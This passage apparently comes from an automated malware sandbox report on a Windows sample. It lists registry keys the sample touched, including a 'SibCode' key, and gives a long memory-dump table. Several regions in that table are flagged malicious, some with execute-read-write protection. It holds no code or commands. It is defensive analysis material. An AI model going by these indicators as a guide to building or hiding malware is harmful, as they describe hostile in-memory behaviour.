HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mkv\OpenWithProgids
WMP11.AssocFile.MKV
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mov\OpenWithProgids
WMP11.AssocFile.MOV
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MP2\OpenWithProgids
WMP11.AssocFile.MP3
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4v\OpenWithProgids
WMP11.AssocFile.MP4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MPE\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mts\OpenWithProgids
WMP11.AssocFile.M2TS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ocx\OpenWithProgids
ocxfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.otf\OpenWithProgids
otffile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.png\OpenWithProgids
pngfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ps1\OpenWithProgids
Microsoft.PowerShellScript.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ps1xml\OpenWithProgids
Microsoft.PowerShellXMLData.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.psd1\OpenWithProgids
Microsoft.PowerShellData.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.psm1\OpenWithProgids
Microsoft.PowerShellModule.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pssc\OpenWithProgids
Microsoft.PowerShellSessionConfiguration.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rle\OpenWithProgids
rlefile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\OpenWithProgids
WMP11.AssocFile.MIDI
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.scf\OpenWithProgids
SHCmdFile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.search-ms\OpenWithProgids
SearchFolder
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml\OpenWithProgids
shtmlfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\OpenWithProgids
WMP11.AssocFile.AU
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sys\OpenWithProgids
sysfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tif\OpenWithProgids
TIFImage.Document
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tiff\OpenWithProgids
TIFImage.Document
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TS\OpenWithProgids
WMP11.AssocFile.TTS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ttc\OpenWithProgids
ttcfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ttf\OpenWithProgids
ttffile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TTS\OpenWithProgids
WMP11.AssocFile.TTS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt\OpenWithProgids
txtfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\OpenWithProgids
WMP11.AssocFile.WAV
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wax\OpenWithProgids
WMP11.AssocFile.WAX
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wdp\OpenWithProgids
wdpfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wm\OpenWithProgids
WMP11.AssocFile.ASF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\OpenWithProgids
WMP11.AssocFile.WMA
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmf\OpenWithProgids
wmffile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv\OpenWithProgids
WMP11.AssocFile.WMV
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmx\OpenWithProgids
WMP11.AssocFile.ASX
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.WPL\OpenWithProgids
WMP11.AssocFile.WPL
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wvx\OpenWithProgids
WMP11.AssocFile.WVX
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xml\OpenWithProgids
xmlfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xsl\OpenWithProgids
xslfile
HKEY_CURRENT_USER\SOFTWARE\SibCode
sn
There are 129 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1F0000
direct allocation
page read and write
malicious
31C0000
direct allocation
page execute and read and write
malicious
31B0000
direct allocation
page read and write
malicious
521000
unclassified section
page read and write
malicious
5095000
heap
page read and write
malicious
561000
unkown
page execute read
malicious
24ABA9F1000
heap
page read and write
malicious
4DE0000
direct allocation
page execute and read and write
malicious
1F0000
direct allocation
page read and write
malicious
24ABABF1000
heap
page read and write
malicious
630000
direct allocation
page read and write
malicious
4DC0000
direct allocation
page read and write
malicious
5F1000
unkown
page execute read
malicious
B660000
unkown
page read and write
malicious
22CBCA81000
heap
page read and write
malicious
5F1000
unkown
page execute read
malicious
1EB1000
unclassified section
page read and write
malicious
4880000
direct allocation
page execute and read and write
malicious
3610000
direct allocation
page execute and read and write
malicious
561000
unkown
page execute read
malicious
5F1000
unkown
page execute read
malicious
5AF8000
heap
page read and write
7FF5D66E8000
unkown
page readonly
24ABAB13000
heap
page read and write
5E97000
heap
page read and write
1190000
unkown
page read and write
24ABAAFB000
heap
page read and write
5121000
heap
page read and write
3B00000
unkown
page read and write
658000
unkown
page write copy
8B70000
unkown
page read and write
3B00000
unkown
page read and write
5681000
heap
page read and write
62E000
stack
page read and write
22CBCB6D000
heap
page read and write
22CBCB4B000
heap
page read and write
7FF5D7591000
unkown
page readonly
8B70000
unkown
page read and write
2CB0000
heap
page read and write
24ABAAE3000
heap
page read and write
33AC000
heap
page read and write
8B70000
unkown
page read and write
3452000
heap
page read and write
1190000
unkown
page read and write
AA0000
trusted library allocation
page read and write
5121000
heap
page read and write
24ABAA4A000
heap
page read and write
1230000
trusted library allocation
page read and write
35BA000
heap
page read and write
4270000
heap
page read and write
8CC0000
stack
page read and write
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
5681000
heap
page read and write
3C23000
unkown
page read and write
8B70000
unkown
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
4103000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
2D97000
heap
page read and write
2B44000
heap
page read and write
A39C000
unkown
page read and write
3074000
heap
page read and write
84D2000
heap
page read and write
24ABAACB000
heap
page read and write
5681000
heap
page read and write
1100000
unkown
page read and write
24ABA88C000
heap
page read and write
24ABA7CF000
heap
page read and write
24ABA7C4000
heap
page read and write
43EC000
stack
page read and write
74FE000
stack
page read and write
5AF8000
heap
page read and write
1190000
unkown
page read and write
22CBCB5B000
heap
page read and write
3074000
heap
page read and write
525E000
stack
page read and write
24ABAADB000
heap
page read and write
BDC0000
unkown
page read and write
33AC000
heap
page read and write
5681000
heap
page read and write
8B70000
unkown
page read and write
3000000
unkown
page read and write
3000000
unkown
page read and write
8CC0000
unkown
page read and write
1170000
unkown
page read and write
24ABAB3B000
heap
page read and write
2B44000
heap
page read and write
C605000
unkown
page read and write
35C1000
heap
page read and write
11A0000
unkown
page read and write
5120000
unkown
page read and write
5121000
heap
page read and write
11A0000
unkown
page read and write
24ABAADB000
heap
page read and write
24ABAA89000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
24ABAAF3000
heap
page read and write
5121000
heap
page read and write
22CBCB7B000
heap
page read and write
5E77000
heap
page read and write
2E42000
heap
page read and write
190000
heap
page read and write
55FC000
heap
page read and write
1230000
trusted library allocation
page read and write
8980000
unkown
page read and write
33AC000
heap
page read and write
22CBCB7B000
heap
page read and write
B660000
unkown
page read and write
11C0000
unkown
page read and write
B3A000
stack
page read and write
5C4B000
heap
page read and write
5121000
heap
page read and write
11C0000
unkown
page read and write
1FF736CD000
heap
page read and write
2B44000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABA7D3000
heap
page read and write
11C0000
unkown
page read and write
C450000
unkown
page read and write
7C70000
unkown
page readonly
7DF4F2470000
unkown
page readonly
5121000
heap
page read and write
8980000
unkown
page read and write
51C0000
heap
page read and write
1190000
unkown
page read and write
5121000
heap
page read and write
32BB000
heap
page read and write
5121000
heap
page read and write
24ABAB43000
heap
page read and write
5121000
heap
page read and write
2390000
heap
page read and write
22CBCB43000
heap
page read and write
35F7000
heap
page read and write
AC69000
trusted library allocation
page read and write
24ABAADB000
heap
page read and write
8980000
unkown
page read and write
5121000
heap
page read and write
22CBCB34000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABA7CF000
heap
page read and write
5681000
heap
page read and write
8B70000
unkown
page read and write
11A0000
unkown
page read and write
8B70000
unkown
page read and write
7FF848E3D000
trusted library allocation
page execute and read and write
408000
unkown
page readonly
5121000
heap
page read and write
8B70000
unkown
page read and write
2B44000
heap
page read and write
529F000
stack
page read and write
24ABAAFB000
heap
page read and write
1190000
unkown
page read and write
1170000
unkown
page read and write
5121000
heap
page read and write
674000
heap
page read and write
68AE000
stack
page read and write
46EE000
stack
page read and write
5A7D000
heap
page read and write
24ABAAF3000
heap
page read and write
22CBCB63000
heap
page read and write
1190000
unkown
page read and write
35C6000
heap
page read and write
8B70000
unkown
page read and write
362D000
unkown
page read and write
8B70000
unkown
page read and write
24ABA800000
heap
page read and write
5121000
heap
page read and write
8980000
unkown
page read and write
1FF712BF000
heap
page read and write
3050000
trusted library allocation
page read and write
400000
unkown
page readonly
24ABAACB000
heap
page read and write
8B70000
unkown
page read and write
942C000
stack
page read and write
8B70000
unkown
page read and write
2B44000
heap
page read and write
24ABAA91000
heap
page read and write
5AF8000
heap
page read and write
24ABA85F000
heap
page read and write
1100000
unkown
page read and write
22CBCB5B000
heap
page read and write
24ABA7FE000
heap
page read and write
1190000
unkown
page read and write
D4B000
heap
page read and write
2B44000
heap
page read and write
22CBCB73000
heap
page read and write
5681000
heap
page read and write
3074000
heap
page read and write
24ABAAF3000
heap
page read and write
22CBCB63000
heap
page read and write
2CE0000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
1190000
unkown
page read and write
22CBCB4B000
heap
page read and write
50C6000
heap
page read and write
2B44000
heap
page read and write
22CBCBAB000
heap
page read and write
404000
unkown
page execute and write copy
3578000
heap
page read and write
5121000
heap
page read and write
70F000
stack
page read and write
21C0000
heap
page read and write
24ABAADB000
heap
page read and write
2B44000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAB13000
heap
page read and write
22CBCB5B000
heap
page read and write
5B4000
unkown
page readonly
32A5000
heap
page read and write
24ABAA69000
heap
page read and write
1FF71020000
unkown
page read and write
5121000
heap
page read and write
24ABAACB000
heap
page read and write
3000000
unkown
page read and write
24ABAAC3000
heap
page read and write
5121000
heap
page read and write
22CBCB63000
heap
page read and write
22CBCB43000
heap
page read and write
2B44000
heap
page read and write
24ABAACB000
heap
page read and write
C7C6000
unkown
page read and write
114A000
unkown
page read and write
4D70000
trusted library allocation
page read and write
6E49000
heap
page read and write
11C0000
unkown
page read and write
22CBCB7B000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
59DD000
stack
page read and write
24ABAAE3000
heap
page read and write
4A44000
unkown
page read and write
5681000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
1100000
unkown
page read and write
32EE000
heap
page read and write
738B000
stack
page read and write
5681000
heap
page read and write
2B44000
heap
page read and write
22CBCB5B000
heap
page read and write
22CBCB73000
heap
page read and write
7FF5D723F000
unkown
page readonly
8CC0000
unkown
page read and write
A3C3000
unkown
page read and write
11D0000
unkown
page read and write
22CBCB63000
heap
page read and write
24ABAADB000
heap
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
2B44000
heap
page read and write
7FF5D76D7000
unkown
page readonly
22CBCB63000
heap
page read and write
24ABAB13000
heap
page read and write
5121000
heap
page read and write
AA0000
trusted library allocation
page read and write
CEC000
heap
page read and write
33AC000
heap
page read and write
24ABAA71000
heap
page read and write
76C000
stack
page read and write
22CBCB73000
heap
page read and write
22CBCB23000
heap
page read and write
24ABAAFB000
heap
page read and write
5121000
heap
page read and write
24ABAB13000
heap
page read and write
8980000
unkown
page read and write
3110000
heap
page readonly
24ABAACB000
heap
page read and write
2B44000
heap
page read and write
1350000
unkown
page readonly
2B44000
heap
page read and write
5A30000
heap
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
22CBCB73000
heap
page read and write
5121000
heap
page read and write
24ABA7D2000
heap
page read and write
24ABAA68000
heap
page read and write
7FF5D71CC000
unkown
page readonly
2B44000
heap
page read and write
5681000
heap
page read and write
1150000
unkown
page read and write
22CBC664000
heap
page read and write
8B70000
unkown
page read and write
BFB8000
stack
page read and write
24ABAAE3000
heap
page read and write
24ABAADB000
heap
page read and write
5121000
heap
page read and write
33AC000
heap
page read and write
11C0000
unkown
page read and write
487F000
stack
page read and write
22CBCB4B000
heap
page read and write
24ABAB2B000
heap
page read and write
7FF5D7077000
unkown
page readonly
5121000
heap
page read and write
20E765A0000
heap
page read and write
8340000
trusted library allocation
page read and write
5121000
heap
page read and write
24ABA7E4000
heap
page read and write
24ABAB13000
heap
page read and write
8F10000
unkown
page read and write
4620000
heap
page read and write
3978000
heap
page read and write
1100000
unkown
page read and write
1100000
unkown
page read and write
1170000
unkown
page read and write
8980000
unkown
page read and write
5121000
heap
page read and write
51C0000
unkown
page read and write
11A0000
unkown
page read and write
22CBCB73000
heap
page read and write
24ABAA4A000
heap
page read and write
8A00000
unkown
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
8980000
unkown
page read and write
24ABA801000
heap
page read and write
2B40000
heap
page read and write
5E68000
heap
page read and write
11C0000
unkown
page read and write
24ABAACB000
heap
page read and write
980000
heap
page read and write
11D0000
unkown
page read and write
8B70000
unkown
page read and write
24ABAAE3000
heap
page read and write
24ABAA6C000
heap
page read and write
5121000
heap
page read and write
8F10000
unkown
page read and write
22CBCB43000
heap
page read and write
7FF5D770A000
unkown
page readonly
22CBCB4B000
heap
page read and write
2B44000
heap
page read and write
33AC000
heap
page read and write
22CBCB73000
heap
page read and write
24ABAA64000
heap
page read and write
2B44000
heap
page read and write
22CBCB5B000
heap
page read and write
22CBCB5B000
heap
page read and write
45F0000
heap
page read and write
560000
unkown
page readonly
24ABAADB000
heap
page read and write
4DEA000
heap
page read and write
8B70000
unkown
page read and write
3C70000
unkown
page read and write
24ABAB2B000
heap
page read and write
65B000
unkown
page readonly
5681000
heap
page read and write
33AC000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAA66000
heap
page read and write
24ABAADB000
heap
page read and write
5121000
heap
page read and write
918F000
trusted library allocation
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
427A000
heap
page read and write
4BD0000
trusted library allocation
page read and write
2B44000
heap
page read and write
1100000
unkown
page read and write
32B0000
heap
page read and write
11E0000
unkown
page read and write
401000
unkown
page execute and read and write
24ABA7C8000
heap
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
5AF8000
heap
page read and write
ED0000
trusted library allocation
page read and write
C669000
unkown
page read and write
7FF5D7425000
unkown
page readonly
5121000
heap
page read and write
1170000
unkown
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
11C0000
unkown
page read and write
7FF5D7534000
unkown
page readonly
5681000
heap
page read and write
4DE6000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
22CBCB93000
heap
page read and write
24AF000
stack
page read and write
22CBCB43000
heap
page read and write
24ABAA4B000
heap
page read and write
3037000
trusted library allocation
page execute and read and write
A391000
unkown
page read and write
2B44000
heap
page read and write
22CBCB7B000
heap
page read and write
A33F000
unkown
page read and write
5121000
heap
page read and write
24ABA897000
heap
page read and write
560000
unkown
page readonly
22CBCB63000
heap
page read and write
5B1E000
stack
page read and write
8CC0000
stack
page read and write
5681000
heap
page read and write
22CBCB43000
heap
page read and write
2B44000
heap
page read and write
24AB899E000
heap
page read and write
4F10000
trusted library allocation
page read and write
22CBCB4B000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
D2C000
heap
page read and write
ED0000
trusted library allocation
page read and write
5121000
heap
page read and write
5CE000
stack
page read and write
1100000
unkown
page read and write
3471000
heap
page read and write
3DC9000
unkown
page read and write
22CBCB4B000
heap
page read and write
4854000
trusted library allocation
page read and write
24ABAAE3000
heap
page read and write
22CBCB93000
heap
page read and write
5330000
unkown
page write copy
4502000
heap
page read and write
24ABAA92000
heap
page read and write
7810000
trusted library allocation
page read and write
24ABAADB000
heap
page read and write
7FF5D7760000
unkown
page readonly
5121000
heap
page read and write
5121000
heap
page read and write
24ABAA91000
heap
page read and write
8B70000
unkown
page read and write
22CBCB5B000
heap
page read and write
7FF5D75D6000
unkown
page readonly
A7F000
heap
page read and write
24ABAADB000
heap
page read and write
7FF5D77E0000
unkown
page readonly
3DF6000
heap
page read and write
AA0000
trusted library allocation
page read and write
24ABAADB000
heap
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
5E5A000
heap
page read and write
24ABAA6C000
heap
page read and write
B980000
unkown
page readonly
AA0C000
unkown
page read and write
5121000
heap
page read and write
24ABAAFB000
heap
page read and write
32B4000
heap
page read and write
5121000
heap
page read and write
5AF8000
heap
page read and write
24ABA88F000
heap
page read and write
11A0000
unkown
page read and write
AA0000
trusted library allocation
page read and write
8B70000
unkown
page read and write
8B70000
unkown
page read and write
32C3000
heap
page read and write
24ABAA66000
heap
page read and write
1141000
unkown
page read and write
2B44000
heap
page read and write
2B44000
heap
page read and write
84D7000
heap
page read and write
24ABA85B000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
24ABAAF3000
heap
page read and write
400000
unkown
page readonly
24ABAAE3000
heap
page read and write
BA0000
trusted library allocation
page read and write
ED0000
trusted library allocation
page read and write
9A8E000
unkown
page read and write
24ABAADB000
heap
page read and write
7FF5D7485000
unkown
page readonly
A3B9000
unkown
page read and write
22CBCB43000
heap
page read and write
8B70000
unkown
page read and write
24ABAACB000
heap
page read and write
24ABAACB000
heap
page read and write
1190000
unkown
page read and write
1FF73560000
heap
page read and write
42AA000
heap
page read and write
5121000
heap
page read and write
1100000
unkown
page read and write
22CBCB4B000
heap
page read and write
24ABAADB000
heap
page read and write
2B44000
heap
page read and write
22CBCB63000
heap
page read and write
5E95000
heap
page read and write
5121000
heap
page read and write
5681000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
22CBCB7B000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABAB23000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
24ABAADB000
heap
page read and write
24ABA7DC000
heap
page read and write
5AF8000
heap
page read and write
3000000
unkown
page read and write
2B44000
heap
page read and write
24AB8A39000
heap
page read and write
5121000
heap
page read and write
1100000
unkown
page read and write
24ABA31E000
heap
page read and write
3187000
heap
page read and write
24ABAB2B000
heap
page read and write
22CBCB73000
heap
page read and write
708E000
stack
page read and write
69BB000
stack
page read and write
35B3000
heap
page read and write
24ABAA8E000
heap
page read and write
5681000
heap
page read and write
11C0000
unkown
page read and write
5AF8000
heap
page read and write
1170000
unkown
page read and write
22CBCBBB000
heap
page read and write
24ABAA85000
heap
page read and write
1100000
unkown
page read and write
24ABAB2B000
heap
page read and write
7FF5D75F6000
unkown
page readonly
2B44000
heap
page read and write
8B70000
unkown
page read and write
4CB0000
direct allocation
page read and write
20E766F3000
heap
page read and write
24ABAB2B000
heap
page read and write
24ABAA76000
heap
page read and write
24ABA884000
heap
page read and write
24ABAAE3000
heap
page read and write
8B70000
unkown
page read and write
22CBCB03000
heap
page read and write
24ABAADB000
heap
page read and write
11D0000
unkown
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
24ABAA6C000
heap
page read and write
24ABAADB000
heap
page read and write
22CBCB63000
heap
page read and write
7FF5D7703000
unkown
page readonly
C5FA000
unkown
page read and write
70C0000
trusted library allocation
page read and write
25C0000
trusted library allocation
page read and write
1190000
unkown
page read and write
8CC0000
unkown
page read and write
24ABA9F1000
heap
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
25C0000
trusted library allocation
page read and write
6A3E000
stack
page read and write
35CA000
heap
page read and write
24ABA7CF000
heap
page read and write
24ABAADB000
heap
page read and write
33C0000
unkown
page read and write
24ABAAC3000
heap
page read and write
5681000
heap
page read and write
8B70000
unkown
page read and write
7FF5D6A4B000
unkown
page readonly
5121000
heap
page read and write
24ABAACB000
heap
page read and write
8F10000
unkown
page read and write
22CBCB5B000
heap
page read and write
A7B000
heap
page read and write
22CBCB7D000
heap
page read and write
D22000
heap
page read and write
5E6F000
heap
page read and write
2B44000
heap
page read and write
8B70000
unkown
page read and write
8250000
trusted library allocation
page read and write
7DF4F2491000
unkown
page execute read
24ABAAFB000
heap
page read and write
24ABAA3F000
heap
page read and write
84A0000
trusted library allocation
page read and write
8B70000
unkown
page read and write
308B000
stack
page read and write
5121000
heap
page read and write
22CBCB4B000
heap
page read and write
22CBCBDB000
heap
page read and write
7FF5D7075000
unkown
page readonly
24ABAA69000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
C47F000
unkown
page read and write
4640000
heap
page readonly
24ABAA69000
heap
page read and write
8B70000
unkown
page read and write
5681000
heap
page read and write
1190000
unkown
page read and write
3351000
unkown
page read and write
5681000
heap
page read and write
35B0000
heap
page read and write
5120000
unkown
page read and write
22CBCB4B000
heap
page read and write
20E76410000
heap
page read and write
8980000
unkown
page read and write
8B70000
unkown
page read and write
24ABAACB000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
6EF0000
trusted library allocation
page read and write
24ABAAF3000
heap
page read and write
5121000
heap
page read and write
5240000
unkown
page read and write
24ABAACB000
heap
page read and write
8F10000
unkown
page read and write
1190000
unkown
page read and write
24ABAADB000
heap
page read and write
3394000
heap
page read and write
22CBCB63000
heap
page read and write
24ABAB5B000
heap
page read and write
5121000
heap
page read and write
F53B000
unkown
page read and write
4E14000
heap
page read and write
5E80000
heap
page read and write
24ABAAF3000
heap
page read and write
B561000
unkown
page read and write
5121000
heap
page read and write
401000
unkown
page execute and write copy
3124000
heap
page read and write
24ABAAF3000
heap
page read and write
5E59000
heap
page read and write
7631000
unkown
page read and write
32A0000
unkown
page execute and read and write
7FF848E12000
trusted library allocation
page read and write
5121000
heap
page read and write
9FAF000
stack
page read and write
2B44000
heap
page read and write
5C6000
unkown
page write copy
5121000
heap
page read and write
3510000
trusted library allocation
page read and write
24ABAB13000
heap
page read and write
9A90000
unkown
page read and write
33F0000
unkown
page read and write
5121000
heap
page read and write
11C0000
unkown
page read and write
D22000
heap
page read and write
24ABAACB000
heap
page read and write
5E6C000
heap
page read and write
5AF8000
heap
page read and write
2B44000
heap
page read and write
5550000
heap
page read and write
5121000
heap
page read and write
24ABAA9C000
heap
page read and write
7FF5D7336000
unkown
page readonly
1100000
unkown
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
1150000
unkown
page read and write
24ABAACB000
heap
page read and write
35AD000
heap
page read and write
4F0000
heap
page read and write
1100000
unkown
page read and write
84F000
stack
page read and write
5121000
heap
page read and write
24ABAA60000
heap
page read and write
22CBCB5B000
heap
page read and write
20E765BB000
heap
page read and write
5121000
heap
page read and write
5E77000
heap
page read and write
1FF735BD000
heap
page read and write
25E0000
heap
page read and write
2B44000
heap
page read and write
11C0000
unkown
page read and write
24ABAACB000
heap
page read and write
1380000
heap
page read and write
24ABAAC3000
heap
page read and write
1190000
unkown
page read and write
24ABAAE8000
heap
page read and write
24ABAA5E000
heap
page read and write
33B0000
unkown
page readonly
32D0000
heap
page read and write
460000
heap
page read and write
301D000
trusted library allocation
page execute and read and write
24ABAACB000
heap
page read and write
5AF8000
heap
page read and write
5121000
heap
page read and write
9178000
trusted library allocation
page read and write
24ABAAFB000
heap
page read and write
24ABAAC3000
heap
page read and write
22CBCB73000
heap
page read and write
2342EF9000
stack
page read and write
1190000
unkown
page read and write
2F5A000
heap
page read and write
5121000
heap
page read and write
22CBCB4B000
heap
page read and write
22CBCB43000
heap
page read and write
7FF5D77DA000
unkown
page readonly
22CBCB5B000
heap
page read and write
22CBCB5B000
heap
page read and write
5681000
heap
page read and write
5E8B000
heap
page read and write
417E000
stack
page read and write
5A85000
heap
page read and write
5681000
heap
page read and write
5681000
heap
page read and write
5121000
heap
page read and write
24ABAACB000
heap
page read and write
3510000
trusted library allocation
page read and write
2B44000
heap
page read and write
9AAC000
unkown
page read and write
22CBCB63000
heap
page read and write
22CBCB4B000
heap
page read and write
1FF72CC0000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABAB23000
heap
page read and write
24ABAACB000
heap
page read and write
8B70000
unkown
page read and write
1190000
unkown
page read and write
4F10000
trusted library allocation
page read and write
24ABAA46000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABA7E3000
heap
page read and write
C663000
unkown
page read and write
22CBCB8B000
heap
page read and write
7FF5D776D000
unkown
page readonly
5121000
heap
page read and write
24ABA897000
heap
page read and write
33AC000
heap
page read and write
5121000
heap
page read and write
1100000
unkown
page read and write
5121000
heap
page read and write
2FF9000
stack
page read and write
24ABAAB3000
heap
page read and write
1150000
unkown
page read and write
5121000
heap
page read and write
22CBCBA3000
heap
page read and write
24ABAA51000
heap
page read and write
24ABAB0B000
heap
page read and write
5121000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAAF3000
heap
page read and write
3510000
trusted library allocation
page read and write
3444000
heap
page read and write
4ACF000
stack
page read and write
24ABAB2B000
heap
page read and write
7010000
trusted library allocation
page read and write
24ABAAE3000
heap
page read and write
918B000
trusted library allocation
page read and write
24ABAAE3000
heap
page read and write
24ABAADB000
heap
page read and write
91E7000
trusted library allocation
page read and write
24ABAADB000
heap
page read and write
24ABAA67000
heap
page read and write
1170000
unkown
page read and write
5121000
heap
page read and write
11C0000
unkown
page read and write
3D20000
unkown
page read and write
1170000
unkown
page read and write
5121000
heap
page read and write
7FF5D7752000
unkown
page readonly
F4F3000
unkown
page read and write
7FF5D77E3000
unkown
page readonly
24ABAACB000
heap
page read and write
1190000
unkown
page read and write
24ABAACB000
heap
page read and write
5121000
heap
page read and write
7FF5D7507000
unkown
page readonly
7FF5D729E000
unkown
page readonly
20E76700000
heap
page read and write
5121000
heap
page read and write
2CFC000
stack
page read and write
7DF4F2480000
unkown
page readonly
9AB2000
unkown
page read and write
11C0000
unkown
page read and write
8D3C000
stack
page read and write
22CBCBBB000
heap
page read and write
22CBCB43000
heap
page read and write
7FF5D7262000
unkown
page readonly
3510000
trusted library allocation
page read and write
C46F000
unkown
page read and write
5AF8000
heap
page read and write
22CBCC03000
heap
page read and write
24ABAACB000
heap
page read and write
22CBCB5B000
heap
page read and write
7FF5D7482000
unkown
page readonly
5121000
heap
page read and write
24ABAA67000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
5121000
heap
page read and write
24ABA7A4000
heap
page read and write
2B44000
heap
page read and write
8B70000
unkown
page read and write
35CF000
unkown
page read and write
7FF5D7488000
unkown
page readonly
1210000
unkown
page read and write
7FF5D778A000
unkown
page readonly
22CBCB43000
heap
page read and write
22CBCB63000
heap
page read and write
2670000
heap
page read and write
2FDE000
stack
page read and write
2B44000
heap
page read and write
32D7000
heap
page read and write
24ABACE8000
heap
page read and write
1FF72B20000
heap
page read and write
8B70000
unkown
page read and write
32A5000
heap
page read and write
24ABA888000
heap
page read and write
24ABAAE3000
heap
page read and write
22CBC621000
heap
page read and write
22CBCB63000
heap
page read and write
22CBCB63000
heap
page read and write
2D2E000
stack
page read and write
C61B000
unkown
page read and write
5121000
heap
page read and write
1FF7107C000
unkown
page read and write
5121000
heap
page read and write
7618000
unkown
page read and write
B0E0000
unkown
page readonly
40E8000
heap
page read and write
5E59000
heap
page read and write
24ABAACB000
heap
page read and write
